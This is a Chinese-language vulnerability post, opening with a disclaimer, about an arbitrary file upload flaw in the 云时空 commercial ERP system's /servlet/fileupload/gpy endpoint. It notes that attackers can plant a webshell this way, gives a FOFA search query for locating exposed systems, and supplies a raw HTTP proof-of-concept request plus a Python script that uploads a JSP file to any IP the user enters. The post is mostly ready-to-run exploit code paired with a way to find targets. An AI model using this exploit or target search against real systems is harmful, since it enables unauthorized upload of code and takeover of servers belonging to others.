声明
本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。
云时空商业ERP以大型集团供应链系统为支撑,是基于互联网技术的多渠道模式营销服务管理体系,可以整合线上和线下交易模式,覆盖企业经营管理应用各个方面。有效掌控全流程情况,敏捷捕捉消费者需求,快速响应市场变化,规避经营风险,以市场为导向,优化部署营销资源,协同产销、供应与服务,帮助您的企业构建敏捷的经营管理平台,还能通过互联网、人工智能等创新模式,整合流通企业上下游产业链资源,协助您共享数字服务,提升企业数字化管控效率。
该系统接口/servlet/fileupload/gpy存在任意文件上传漏洞,通过此漏洞,攻击者可上传webshell木马,远程控制服务器。
fofa语法
?app="云时空社会化商业ERP系统"
POC
POST /servlet/fileupload/gpy HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=4eea98d02AEa93f60ea08dE3C18A1388
Content-Length: 238
--4eea98d02AEa93f60ea08dE3C18A1388
Content-Disposition: form-data; name="file1"; filename="check.jsp"
Content-Type: application/octet-stream
<% out.println("This website has a vulnerability"); %>
--4eea98d02AEa93f60ea08dE3C18A1388--
?文件上传成功后路径为:/uploads/pics/上传日期/check.jsp
import requests
def verify(ip):
url = f'{ip}/servlet/fileupload/gpy'
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0',
'Accept-Encoding': 'gzip, deflate',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'DNT': '1',
'Connection': 'close',
'Accept - Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
'Upgrade - Insecure - Requests': '1',
'Content-Type': 'multipart/form-data; boundary=4eea98d02AEa93f60ea08dE3C18A1388',
'Content-Length': '238'
}
payload = '''
--4eea98d02AEa93f60ea08dE3C18A1388
Content-Disposition: form-data; name="file1"; filename="check.jsp"
Content-Type: application/octet-stream
<% out.println("This website has a vulnerability"); %>
--4eea98d02AEa93f60ea08dE3C18A1388--
'''
try:
response = requests.post(url, headers=headers, data=payload)
# 验证成功输出相关信息
if response.status_code == 200 and response.content:
print(f"{ip}存在云时空社会化商业ERP系统任意文件上传漏洞!!!")
except Exception as e:
pass
if __name__ == '__main__':
self = input('请输入目标主机IP地址:')
verify(self)